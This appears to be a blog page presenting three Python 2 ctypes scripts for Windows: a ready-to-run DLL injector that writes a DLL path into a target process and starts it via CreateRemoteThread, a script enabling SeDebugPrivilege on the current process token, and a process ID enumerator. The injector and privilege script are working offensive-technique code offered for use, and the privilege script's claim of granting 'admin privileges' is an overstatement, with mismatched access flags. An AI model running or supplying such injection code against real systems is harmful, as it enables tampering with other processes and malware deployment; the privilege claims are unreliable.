DLL Injection in python

Following code utilises kernel32.CreateRemoteThread function to add a thread with the selected DLL to the selected process ( also known as DLL injection ). Following steps are executed :
1) Get Process Handle (by PID)
2) Allocate space for dll path
3) Write dll path to the process selected in step 1
4) Resolve address of kernel32.dll & LoadLibraryA function
5) Use info from step 2,3,4 to call kernel32.CreateRemoteThread with specified DLL
6) DLL Injected ;D

print "[+] Universal DLL Injector by Y"
print "[+] contact : If you know me then give me a shout"
print "[+] usage: ./dll_injector.py <PID> <DLLPATH>"
print "\n"

from ctypes import *
import sys,ctypes

# Define constants we use
PAGE_RW_PRIV = 0x04
PROCESS_ALL_ACCESS = 0x1F0FFF
VIRTUAL_MEM = 0x3000

#CTYPES handler
kernel32 = windll.kernel32

def dll_inject(PID,DLL_PATH):
    print "[+] Starting DLL Injector"
    LEN_DLL = len(DLL_PATH)# get the length of the DLL PATH 
    print "\t[+] Getting process handle for PID:%d " % PID 
    hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS,False,PID)
    
    if hProcess == None:
        print "\t[+] Unable to get process handle"
        sys.exit(0)
    print "\t[+] Allocating space for DLL PATH"
    DLL_PATH_ADDR = kernel32.VirtualAllocEx(hProcess, 
                                            0,
                                            LEN_DLL,
                                            VIRTUAL_MEM,
                                            PAGE_RW_PRIV)
    bool_Written = c_int(0)
    print "\t[+] Writing DLL PATH to current process space"
    kernel32.WriteProcessMemory(hProcess,
                                DLL_PATH_ADDR,
                                DLL_PATH,
                                LEN_DLL,
                                byref(bool_Written))
    print "\t[+] Resolving Call Specific functions & libraries"
    kernel32DllHandler_addr = kernel32.GetModuleHandleA("kernel32")
    print "\t\t[+] Resolved kernel32 library at 0x%08x" % kernel32DllHandler_addr
    LoadLibraryA_func_addr = kernel32.GetProcAddress(kernel32DllHandler_addr,"LoadLibraryA")
    print "\t\t[+] Resolve LoadLibraryA function at 0x%08x" %LoadLibraryA_func_addr
    
    thread_id = c_ulong(0) # for our thread id
    print "\t[+] Creating Remote Thread to load our DLL"
    if not kernel32.CreateRemoteThread(hProcess,
                                None,
                                0,
                                LoadLibraryA_func_addr,
                                DLL_PATH_ADDR,
                                0,
                                byref(thread_id)):
        print "Injection Failed, exiting"
        sys.exit(0)
    else:
        print "Remote Thread 0x%08x created, DLL code injected" % thread_id.value
PID = int(sys.argv[1])
DLL_PATH = str(sys.argv[2])
dll_inject(PID, DLL_PATH)

Universal Process Privilage Escalation

By adjusting process token its possible to elevate your current process privileges to enable certain functionality not available otherwise.

Basically steps we follow are :
1) Get current process handle
2) Get current process token
3) Resolve SeDebugPrivilege value
4) Created new Token with the resolved value from step 3
5) Adjust the token of the current process with new privilege
6) Close process handle

Following code demonstrates the principle.

print "[+] Universal Process Escalation by Y"
print "[+] contact : If you know me then give me a shout"

from ctypes import windll
import ctypes
from ctypes import *

class TOKEN_PRIVS(ctypes.Structure):
    _fields_ = (
        ("PrivilegeCount",    ULONG),
        ("Privileges",        ULONG * 3 )
    )

def get_debug_privs():
    # Adjust Current TOKEN
    token = HANDLE()
    print "\t[+] Getting Current Token"
    flags =  40 #  TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY
    windll.advapi32.OpenProcessToken(windll.kernel32.GetCurrentProcess(), 0x00000020, ctypes.byref(token))
    print "\t[+] Calculating Local SeDebugPrivilege"
    admin_priv_name = "SeDebugPrivilege" # we want this priv on the process
    pBytesReturned = ctypes.c_ulong() 
    windll.advapi32.LookupPrivilegeValueA(None,admin_priv_name,ctypes.byref(pBytesReturned))
    print "\t[+] Resolved SeDebugPrivilege as %d" % pBytesReturned.value
    print "\t[+] Modifying TOKEN Structure to enable Debug"
    privs = TOKEN_PRIVS()
    privs.PrivilegeCount = 1
    privs.Privileges = (pBytesReturned.value,0, 2) 
    print "\t[+] Adjusting Privileges of the current process"
    windll.advapi32.AdjustTokenPrivileges(token, 0, ctypes.byref(privs),0,0,0)
    print "\t[+] Closing current handle, almost done"
    windll.kernel32.CloseHandle(token)
    print "[+] Done, your process " , windll.kernel32.GetCurrentProcessId(), "has now admin privileges"
    ############ CURRENT TOKEN ADJUSTED ##################
	
get_debug_privs()

PID Enumeration on Windows with pure python ctypes

Following code will enumerate process ID’s on the current system by calling EnumProcesses from psapi on Windows. Should for for majority of windows distributions that have psapi.dll in %systemroot%.

from ctypes import *

psapi = windll.psapi

print "[+] PID dumper by Y"
print "[+] contact : If you know me then give me a shout"

def getListOfProcesses():
    max_array = c_ulong * 4096 # define long array to capture all the processes
    pProcessIds = max_array() # array to store the list of processes
    pBytesReturned = c_ulong() # the number of bytes returned in the array
    #EnumProcess 
    psapi.EnumProcesses(byref(pProcessIds),
                        sizeof(pProcessIds),
                        byref(pBytesReturned))
 
    # get the number of returned processes
    nReturned = pBytesReturned.value/sizeof(c_ulong())
    pidProcessArray = [i for i in pProcessIds][:nReturned]
    for processes in pidProcessArray:
        print "[+] Running Process PID %d" % processes 

getListOfProcesses()